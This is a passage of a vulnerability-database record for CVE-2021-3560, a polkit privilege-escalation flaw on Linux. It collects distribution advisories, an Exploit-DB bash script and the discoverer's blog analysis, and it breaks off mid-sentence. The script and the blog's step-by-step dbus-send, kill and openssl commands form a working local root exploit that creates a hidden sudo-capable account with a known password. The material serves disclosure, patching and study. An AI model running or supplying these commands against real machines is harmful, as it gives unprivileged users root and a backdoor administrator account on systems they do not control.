false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-03T07:54:47", "id": "RLSA-2021:2238", "href": "https://errata.rockylinux.org/RLSA-2021:2238", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "prion": [{"lastseen": "2023-08-16T06:12:44", "description": "It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. 
This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T19:15:00", "type": "prion", "title": "CVE-2021-3560", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2023-06-12T07:15:00", "id": "PRION:CVE-2021-3560", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-3560", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2023-06-29T13:53:32", "description": "It was found that polkit could be tricked into bypassing the credential\nchecks for D-Bus requests, elevating the privileges of the requestor to the\nroot user. This flaw could be used by an unprivileged local attacker to,\nfor example, create a new local administrator. 
The highest threat from this\nvulnerability is to data confidentiality and integrity as well as system\navailability.\n\n#### Bugs\n\n * <https://gitlab.freedesktop.org/polkit/polkit/-/issues/140>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=1961710>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | commit introducing issue was backported to policykit-1 version in Ubuntu in focal+\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T00:00:00", "type": "ubuntucve", "title": "CVE-2021-3560", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-03T00:00:00", "id": "UB:CVE-2021-3560", "href": "https://ubuntu.com/security/CVE-2021-3560", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2022-02-28T18:13:09", "description": "[0.115-11.0.1]\n- Increase timeout to avoid defunct processes [Orabug: 26930744]\n[0.115-11.1]\n- early disconnection from D-Bus results in privilege esc.\n- Resolves: CVE-2021-3560", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-04T00:00:00", "type": "oraclelinux", "title": "polkit security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-04T00:00:00", "id": "ELSA-2021-2238", "href": "http://linux.oracle.com/errata/ELSA-2021-2238.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2023-09-26T12:52:23", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-15T00:00:00", "type": "exploitdb", "title": "Polkit 0.105-26 0.117-2 - Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 
"LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-3560", "CVE-2021-3560"], "modified": "2021-06-15T00:00:00", "id": "EDB-ID:50011", "href": "https://www.exploit-db.com/exploits/50011", "sourceData": "# Exploit Title: Polkit 0.105-26 0.117-2 - Local Privilege Escalation\r\n# Date: 06/11/2021\r\n# Exploit Author: J Smith (CadmusofThebes)\r\n# Vendor Homepage: https://www.freedesktop.org/\r\n# Software Link: https://www.freedesktop.org/software/polkit/docs/latest/polkitd.8.html\r\n# Version: polkit 0.105-26 (Ubuntu), polkit 0.117-2 (Fedora)\r\n# Tested on: Ubuntu 20.04, Fedora 33\r\n# CVE: CVE-2021-3560\r\n# Source: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/\r\n\r\n#!/bin/bash\r\n\r\n# Set the name and display name\r\nuserName=\"hacked\"\r\nrealName=\"hacked\"\r\n\r\n# Set the account as an administrator\r\naccountType=1 \r\n\r\n# Set the password hash for 'password' and password hint\r\npassword='$5$WR3c6uwMGQZ/JEZw$OlBVzagNJswkWrKRSuoh/VCrZv183QpZL7sAeskcoTB'\r\npassHint=\"password\"\r\n\r\n# Check Polkit version\r\npolkitVersion=$(systemctl status polkit.service | grep version | cut -d \" \" -f 9)\r\nif [[ \"$(apt list --installed 2>/dev/null | grep polkit | grep -c 0.105-26)\" -ge 1 || \"$(yum list installed | grep polkit | grep -c 0.117-2)\" ]]; then\r\n echo \"[*] Vulnerable version of polkit found\"\r\nelse\r\n echo \"[!] WARNING: Version of polkit might not vulnerable\"\r\nfi\r\n\r\n# Validate user is running in SSH instead of desktop terminal\r\nif [[ -z $SSH_CLIENT || -z $SSH_TTY ]]; then\r\n echo \"[!] 
WARNING: SSH into localhost first before running this script in order to avoid authentication prompts\"\r\n exit\r\nfi\r\n\r\n# Test the dbus-send timing to load into exploit\r\necho \"[*] Determining dbus-send timing\"\r\nrealTime=$( TIMEFORMAT=\"%R\"; { time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType ; } 2>&1 | cut -d \" \" -f6 )\r\nhalfTime=$(echo \"scale=3;$realTime/2\" | bc)\r\n\r\n# Check for user first in case previous run of script failed on password set\r\nif id \"$userName\" &>/dev/null; then\r\n userid=$(id -u $userName)\r\n echo \"[*] New user $userName already exists with uid of $userid\"\r\nelse\r\n userid=\"\"\r\n\techo \"[*] Attempting to create account\"\r\n while [[ $userid == \"\" ]]\r\n do\r\n dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null\r\n if id \"$userName\" &>/dev/null; then\r\n\t userid=$(id -u $userName)\r\n echo \"[*] New user $userName created with uid of $userid\"\r\n fi\r\n done\r\nfi\r\n\r\n# Add the password to /etc/shadow\r\n# Sleep added to ensure there is enough of a delay between timestamp checks\r\necho \"[*] Adding password to /etc/shadow and enabling user\"\r\nsleep 1\r\ncurrentTimestamp=$(stat -c %Z /etc/shadow)\r\nfileChanged=\"n\"\r\nwhile [ $fileChanged == \"n\" ]\r\ndo \r\n dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$userid org.freedesktop.Accounts.User.SetPassword string:$password string:$passHint 2>/dev/null & sleep $halfTime ; kill $! 
2>/dev/null\r\n\tif [ $(stat -c %Z /etc/shadow) -ne $currentTimestamp ];then\r\n\t fileChanged=\"y\"\r\n\t echo \"[*] Exploit complete!\"\r\n\tfi\r\ndone\r\n\r\necho \"\"\r\necho \"[*] Run 'su - $userName', followed by 'sudo su' to gain root access\"", "sourceHref": "https://www.exploit-db.com/raw/50011", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2021-07-24T09:55:15", "description": "# Privilege escalation with polkit: How to get root on Linux with a seven-year-old bug\n\n[Kevin Backhouse](https://github.blog/author/kevinbackhouse/)\n\n[polkit](https://gitlab.freedesktop.org/polkit/polkit/) is a system service\ninstalled by default on many Linux distributions. It's used by\n[systemd](https://systemd.io/), so any Linux distribution that uses systemd\nalso uses polkit. As a member of [GitHub Security\nLab](https://securitylab.github.com/), my job is to help improve the security\nof open source software by finding and reporting vulnerabilities. A few weeks\nago, I found a privilege escalation vulnerability in polkit. I coordinated the\ndisclosure of the vulnerability with the polkit maintainers and with [Red\nHat's security team.](https://access.redhat.com/security/overview/) It was\npublicly disclosed, the fix was released on June 3, 2021, and it was assigned\n[CVE-2021-3560](https://access.redhat.com/security/cve/CVE-2021-3560).\n\nThe vulnerability enables an unprivileged local user to get a root shell on\nthe system. It's easy to exploit with a few standard command line tools, as\nyou can see in this [short video](https://youtu.be/QZhz64yEd0g).
In this blog\npost, I'll explain how the exploit works and show you where the bug was in the\nsource code.\n\n**Table of contents**\n\n * History of CVE-2021-3560 and vulnerable distributions\n * About polkit\n * Exploitation steps\n * polkit architecture\n * The vulnerability\n * org.freedesktop.policykit.imply annotations\n * Conclusion\n\n## History of CVE-2021-3560 and vulnerable distributions\n\nThe bug I found was quite old. It was introduced seven years ago in commit\n[bfa5036](https://gitlab.freedesktop.org/polkit/polkit/-/commit/bfa5036bfb93582c5a87c44b847957479d911e38)\nand first shipped with polkit version 0.113. However, many of the most popular\nLinux distributions didn't ship the vulnerable version until more recently.\n\nThe bug has a slightly different history on [Debian](https://www.debian.org/)\nand its derivatives (such as [Ubuntu](https://ubuntu.com/)), because Debian\nuses a [fork of polkit](https://salsa.debian.org/utopia-team/polkit) with a\ndifferent version numbering scheme. In the Debian fork, the bug was introduced\nin commit [f81d021](https://salsa.debian.org/utopia-\nteam/polkit/-/commit/f81d021e3cb97a0816285eb95c2a77f554d30966) and first\nshipped with version 0.105-26. The most recent stable release of Debian,\n[Debian 10 (\"buster\")](https://www.debian.org/releases/buster/), uses version\n0.105-25, which means that it isn't vulnerable. However, some Debian\nderivatives, such as Ubuntu, are based on [Debian\nunstable](https://www.debian.org/releases/sid/), which is vulnerable.\n\nHere's a table with a selection of popular distributions and whether they're\nvulnerable (note that this isn't a comprehensive list):\n\n| Distribution | Vulnerable? 
|\n| --------------------------- | ------------------------------------------------------------ |\n| RHEL 7 | No |\n| RHEL 8 | [Yes](https://access.redhat.com/security/cve/CVE-2021-3560) |\n| Fedora 20 (or earlier) | No |\n| Fedora 21 (or later) | [Yes](https://bugzilla.redhat.com/show_bug.cgi?id=1967424) |\n| Debian 10 (\u201cbuster\u201d) | No |\n| Debian testing (\u201cbullseye\u201d) | [Yes](https://security-tracker.debian.org/tracker/CVE-2021-3560) |\n| Ubuntu 18.04 | No |\n| Ubuntu 20.04 | [Yes](https://ubuntu.com/security/CVE-2021-3560) |\n\n## About polkit\n\n[polkit](https://gitlab.freedesktop.org/polkit/polkit/) is the system service\nthat's running under the hood when you see a dialog box like the one below:\n\n\n\nIt essentially plays the role of a judge. If you want to do something that\nrequires higher privileges--for example, creating a new user account--then\nit's polkit's job to decide whether or not you're allowed to do it. For some\nrequests, polkit will make an instant decision to allow or deny, and for\nothers it will pop up a dialog box so that an administrator can grant\nauthorization by entering their password.\n\nThe dialog box might give the impression that polkit is a graphical system,\nbut it's actually a background process. The dialog box is known as an\n_authentication agent_ and it's really just a mechanism for sending your\npassword to polkit. To illustrate that polkit isn't just for graphical\nsessions, try running this command in a terminal:\n\n\n\u200b \n\n pkexec reboot\n\n[`pkexec`](https://manpages.ubuntu.com/manpages/focal/en/man1/pkexec.1.html)\nis a similar command to\n[`sudo`](https://manpages.ubuntu.com/manpages/focal/en/man8/sudo.8.html),\nwhich enables you to run a command as root. 
If you run `pkexec` in a graphical\nsession, it will pop up a dialog box, but if you run it in a text-mode session\nsuch as SSH then it starts its own text-mode authentication agent:\n\n $ pkexec reboot\n ==== AUTHENTICATING FOR org.freedesktop.policykit.exec ===\n Authentication is needed to run `/usr/sbin/reboot' as the super user\n Authenticating as: Kevin Backhouse,,, (kev)\n Password:\n\nAnother command that you can use to trigger `polkit` from the command line is\n[`dbus-send`](https://manpages.ubuntu.com/manpages/focal/en/man1/dbus-send.1.html). It's a general purpose tool for sending D-Bus messages that's\nmainly used for testing, but it's usually installed by default on systems that\nuse D-Bus. It can be used to simulate the D-Bus messages that the graphical\ninterface might send. For example, this is the command to create a new user:\n\n dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:\"Boris Ivanovich Grishenko\" int32:1\n\nIf you run that command in a graphical session, an authentication dialog box\nwill pop up, but if you run it in a text-mode session such as\n[SSH](https://www.openssh.com/), then it fails immediately. That's because,\nunlike `pkexec`, `dbus-send` does not start its own authentication agent.\n\n## Exploitation steps\n\nThe vulnerability is surprisingly easy to exploit. All it takes is a few\ncommands in the terminal using only standard tools like [`bash`](https://manpages.ubuntu.com/manpages/focal/en/man1/bash.1.html), [`kill`](https://manpages.ubuntu.com/manpages/focal/en/man1/kill.1.html), and [`dbus-send`](https://manpages.ubuntu.com/manpages/focal/en/man1/dbus-send.1.html).\n\nThe proof of concept (PoC) exploit I describe in this section depends on two\npackages being installed: `accountsservice` and `gnome-control-center`.
On a\ngraphical system such as Ubuntu Desktop, both of those packages are usually\ninstalled by default. But if you're using something like a non-graphical RHEL\nserver, then you might need to install them, like this:\n\n\n\u200b \n\n sudo yum install accountsservice gnome-control-center\n\nOf course, the vulnerability doesn't have anything specifically to do with\neither `accountsservice` or `gnome-control-center`. They're just polkit\nclients that happen to be convenient vectors for exploitation. The reason why\nthe PoC depends on `gnome-control-center` and not just `accountsservice` is\nsubtle--I'll explain that later.\n\nTo avoid repeatedly triggering the authentication dialog box (which can be\nannoying), I recommend running the commands from an SSH session:\n\n\n\u200b \n\n ssh localhost\n\nThe vulnerability is triggered by starting a `dbus-send` command but killing\nit while polkit is still in the middle of processing the request. I like to\nthink that it's theoretically possible to trigger by smashing Ctrl+C at just\nthe right moment, but I've never succeeded, so I do it with a small amount of\nbash scripting instead. 
First, you need to measure how long it takes to run\nthe `dbus-send` command normally:\n\n\n\u200b \n\n time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:\"Boris Ivanovich Grishenko\" int32:1\n\nThe output will look something like this:\n\n\n\u200b \n\n Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required\n \n real 0m0.016s\n user 0m0.005s\n sys 0m0.000s\n\nThat took 16 milliseconds for me, so that means that I need to kill the `dbus-\nsend` command after approximately 8 milliseconds:\n\n\n\u200b \n\n dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:\"Boris Ivanovich Grishenko\" int32:1 & sleep 0.008s ; kill $!\n\nYou might need to run that a few times, and you might need to experiment with\nthe number of milliseconds in the delay. When the exploit succeeds, you'll see\nthat a new user named `boris` has been created:\n\n\n\u200b \n\n $ id boris\n uid=1002(boris) gid=1002(boris) groups=1002(boris),27(sudo)\n\nNotice that `boris` is a member of the `sudo` group, so you're already well on\nyour way to full privilege escalation. Next, you need to set a password for\nthe new account. 
The D-Bus interface expects a hashed password, which you can\ncreate using `openssl`:\n\n\n\u200b \n\n $ openssl passwd -5 iaminvincible!\n $5$Fv2PqfurMmI879J7$ALSJ.w4KTP.mHrHxM2FYV3ueSipCf/QSfQUlATmWuuB\n\nNow you just have to do the same trick again, except this time call the\n`SetPassword` D-Bus method:\n\n\n\u200b \n\n dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1002 org.freedesktop.Accounts.User.SetPassword string:'$5$Fv2PqfurMmI879J7$ALSJ.w4KTP.mHrHxM2FYV3ueSipCf/QSfQUlATmWuuB' string:GoldenEye & sleep 0.008s ; kill $!\n\nAgain, you might need to experiment with the length of the delay and run it\nseveral times until it succeeds. Also, note that you need to paste in the\ncorrect user identifier (UID), which is \"1002\" in this example, plus the\npassword hash from the `openssl` command.\n\nNow you can login as boris and become root:\n\n\n\u200b \n\n su - boris # password: iaminvincible!\n sudo su # password: iaminvincible!\n\n\n\n## polkit architecture\n\nTo help explain the vulnerability, here's a diagram of the five main processes\ninvolved during the `dbus-send` command:\n\n\n\nThe two processes above the dashed line--`dbus-send` and the authentication\nagent--are unprivileged user processes. Those below the line are privileged\nsystem processes. In the center is `dbus-daemon`, which handles all of the\ncommunication: the other four processes communicate with each other by sending\nD-Bus messages.\n\n`dbus-daemon` plays a very important role in the security of polkit, because\nit enables the four processes to communicate securely and check each other's\ncredentials. For example, when the authentication agent sends an\nauthentication cookie to polkit, it does so by sending it to the\n`org.freedesktop.PolicyKit1` D-Bus address. Since that address is only allowed\nto be registered by a root process, there is no risk of an unprivileged\nprocess intercepting messages. 
`dbus-daemon` also assigns every connection a\n\"unique bus name:\" typically something like \":1.96\". It's a bit like a process\nidentifier (PID), except without being vulnerable to [PID recycling\nattacks](https://securitylab.github.com/research/ubuntu-apport-\nCVE-2019-15790/). Unique bus names are currently chosen from a 64-bit range,\nso there's no risk of a vulnerability caused by a name being reused.\n\nThis is the sequence of events:\n\n 1. `dbus-send` asks `accounts-daemon` to create a new user.\n 2. `accounts-daemon` receives the D-Bus message from `dbus-send`. The message includes the unique bus name of the sender. Let's assume it's \":1.96\". This name is attached to the message by `dbus-daemon` and cannot be forged.\n 3. `accounts-daemon` asks polkit if connection :1.96 is authorized to create a new user.\n 4. polkit asks `dbus-daemon` for the UID of connection :1.96.\n 5. If the UID of connection :1.96 is \"0,\" then polkit immediately authorizes the request. Otherwise, it sends the authentication agent a list of administrator users who are allowed to authorize the request.\n 6. The authentication agent opens a dialog box to get the password from the user.\n 7. The authentication agent sends the password to polkit.\n 8. polkit sends a \"yes\" reply back to `accounts-daemon`.\n 9. `accounts-daemon` creates the new user account.\n\n## The vulnerability\n\nWhy does killing the `dbus-send` command cause an authentication bypass? The\nvulnerability is in step four of the sequence of events listed above. What\nhappens if polkit asks `dbus-daemon` for the UID of connection :1.96, but\nconnection :1.96 no longer exists? `dbus-daemon` handles that situation\ncorrectly and returns an error. But it turns out that polkit does not handle\nthat error correctly. In fact, polkit mishandles the error in a particularly\nunfortunate way: rather than rejecting the request, it treats the request as\nthough it came from a process with UID 0. 
In other words, it immediately\nauthorizes the request because it thinks the request has come from a root\nprocess.\n\nWhy is the timing of the vulnerability non-deterministic? It turns out that\npolkit asks `dbus-daemon` for the UID of the requesting process multiple\ntimes, on different codepaths. Most of those codepaths handle the error\ncorrectly, but one of them doesn't. If you kill the `dbus-send` command early,\nit's handled by one of the correct codepaths and the request is rejected. To\ntrigger the vulnerable codepath, you have to disconnect at just the right\nmoment. And because there are multiple processes involved, the timing of that\n\"right moment\" varies from one run to the next. That's why it usually takes a\nfew tries for the exploit to succeed. I'd guess it's also the reason why the\nbug wasn't previously discovered. If you could trigger the vulnerability by\nkilling the `dbus-send` command immediately, then I expect it would have been\ndiscovered a long time ago, because that's a much more obvious thing to test\nfor.\n\nThe function which asks `dbus-daemon` for the UID of the requesting connection\nis named\n[`polkit_system_bus_name_get_creds_sync`](https://gitlab.freedesktop.org/polkit/polkit/-/blob/bfa5036bfb93582c5a87c44b847957479d911e38/src/polkit/polkitsystembusname.c#L388):\n\n\n\u200b \n\n static gboolean\n polkit_system_bus_name_get_creds_sync (\n PolkitSystemBusName *system_bus_name,\n guint32 *out_uid,\n guint32 *out_pid,\n GCancellable *cancellable,\n GError **error)\n\nThe behavior of\n[`polkit_system_bus_name_get_creds_sync`](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkit/polkitsystembusname.c#L388)\nis strange, because when an error occurs, the function sets the error\nparameter but still returns `TRUE`. It wasn't clear to me, when I wrote my\n[bug report](https://gitlab.freedesktop.org/polkit/polkit/-/issues/140),\nwhether that was a bug or a deliberate design choice. 
(It turns out that it\nwas a bug, because the polkit developers have [fixed the\nvulnerability](https://gitlab.freedesktop.org/polkit/polkit/-/commit/a04d13affe0fa53ff618e07aa8f57f4c0e3b9b81)\nby returning `FALSE` on error.) My uncertainty arose from the fact that\n_almost all_ the callers of `polkit_system_bus_name_get_creds_sync` don't just\ncheck the Boolean result, but also check that the error value is still `NULL`\nbefore proceeding. The cause of the vulnerability was that the error value\nwasn't checked in the following stack trace:\n\n\n\u200b \n\n 0 in polkit_system_bus_name_get_creds_sync of [polkitsystembusname.c:388](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkit/polkitsystembusname.c#L388)\n 1 in polkit_system_bus_name_get_user_sync of [polkitsystembusname.c:511](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkit/polkitsystembusname.c#L511)\n 2 in polkit_backend_session_monitor_get_user_for_subject of [polkitbackendsessionmonitor-systemd.c:303](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendsessionmonitor-systemd.c#L303)\n 3 in check_authorization_sync of [polkitbackendinteractiveauthority.c:1121](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendinteractiveauthority.c#L1121)\n 4 in check_authorization_sync of [polkitbackendinteractiveauthority.c:1227](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendinteractiveauthority.c#L1227)\n 5 in polkit_backend_interactive_authority_check_authorization of [polkitbackendinteractiveauthority.c:981](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendinteractiveauthority.c#L981)\n 6 in 
polkit_backend_authority_check_authorization of [polkitbackendauthority.c:227](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendauthority.c#L227)\n 7 in server_handle_check_authorization of [polkitbackendauthority.c:790](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendauthority.c#L790)\n 7 in server_handle_method_call of [polkitbackendauthority.c:1272](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendauthority.c#L1272)\n\nThe bug is in this snippet of code in\n[`check_authorization_sync`](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendinteractiveauthority.c#L1121):\n\n\n\u200b \n\n /* every subject has a user; this is supplied by the client, so we rely\n * on the caller to validate its acceptability. */\n user_of_subject = polkit_backend_session_monitor_get_user_for_subject (priv->session_monitor,\n subject, NULL,\n error);\n if (user_of_subject == NULL)\n goto out;\n \n /* special case: uid 0, root, is _always_ authorized for anything */\n if (POLKIT_IS_UNIX_USER (user_of_subject) && polkit_unix_user_get_uid (POLKIT_UNIX_USER (user_of_subject)) == 0)\n {\n result = polkit_authorization_result_new (TRUE, FALSE, NULL);\n goto out;\n }\n\nNotice that the value of `error` is not checked.\n\n## `org.freedesktop.policykit.imply` annotations\n\nI mentioned earlier that my PoC depends on `gnome-control-center` being\ninstalled, in addition to `accountsservice`. Why is that? The PoC doesn't use\n`gnome-control-center` in any visible way, and I didn't even realize that I\nwas depending on it when I wrote the PoC! In fact, I only found out because\nthe Red Hat security team couldn't reproduce my PoC on RHEL. 
When I tried it\nfor myself on a RHEL 8.4 VM, I also found that the PoC didn't work. That was\npuzzling, because it was working beautifully on Fedora 32 and CentOS Stream.\nThe crucial difference, it turned out, was that my RHEL VM was a non-graphical\nserver with no GNOME installed. So why does that matter? The answer is\n`policykit.imply` annotations.\n\nSome polkit actions are essentially equivalent to each other, so if one has\nalready been authorized then it makes sense to silently authorize the other.\nThe GNOME settings dialog is a good example:\n\n\n\nAfter you've clicked the \"Unlock\" button and entered your password, you can do\nthings like adding a new user account without having to authenticate a second\ntime. That's handled by a `policykit.imply` annotation, which is defined in\nthis [config file](https://gitlab.gnome.org/GNOME/gnome-control-\ncenter/-/blob/54eb734eaaa95807dd805fbe4e4ad0dceb787736/panels/user-\naccounts/org.gnome.controlcenter.user-accounts.policy.in):\n\n\n\u200b \n\n /usr/share/polkit-1/actions/org.gnome.controlcenter.user-accounts.policy\n\nThe config file contains the following implication:\n\n\n\nIn other words, if you're authorized to perform `controlcenter` admin actions,\nthen you're also authorized to perform `accountsservice` admin actions.\n\nWhen I attached [GDB](https://www.gnu.org/software/gdb/) to polkit on my RHEL\nVM, I found that I wasn't seeing the vulnerable stack trace that I listed\nearlier. Notice that step four of the stack trace is a recursive call from\n`check_authorization_sync` to itself. 
That happens on [line\n1227](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendinteractiveauthority.c#L1227),\nwhich is where polkit checks the `policykit.imply` annotations:\n\n PolkitAuthorizationResult *implied_result = NULL;\n PolkitImplicitAuthorization implied_implicit_authorization;\n GError *implied_error = NULL;\n const gchar *imply_action_id;\n \n imply_action_id = polkit_action_description_get_action_id (imply_ad);\n \n /* g_debug (\"%s is implied by %s, checking\", action_id, imply_action_id); */\n implied_result = check_authorization_sync (authority, caller, subject,\n imply_action_id,\n details, flags,\n &implied_implicit_authorization, TRUE,\n &implied_error);\n if (implied_result != NULL)\n {\n if (polkit_authorization_result_get_is_authorized (implied_result))\n {\n g_debug (\" is authorized (implied by %s)\", imply_action_id);\n result = implied_result;\n /* cleanup */\n g_strfreev (tokens);\n goto out;\n }\n g_object_unref (implied_result);\n }\n if (implied_error != NULL)\n g_error_free (implied_error);\n\nThe authentication bypass depends on the error value getting ignored. It was\nignored on [line\n1121](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendinteractiveauthority.c#L1121),\nbut it's still stored in the `error` parameter, so it also needs to be ignored\nby the caller. The block of code above has a temporary variable named\n`implied_error`, which is ignored when `implied_result` isn't null. That's the\ncrucial step that makes the bypass possible.\n\nTo sum up, the authentication bypass only works on polkit actions that are\nimplied by another polkit action. That's why my PoC only 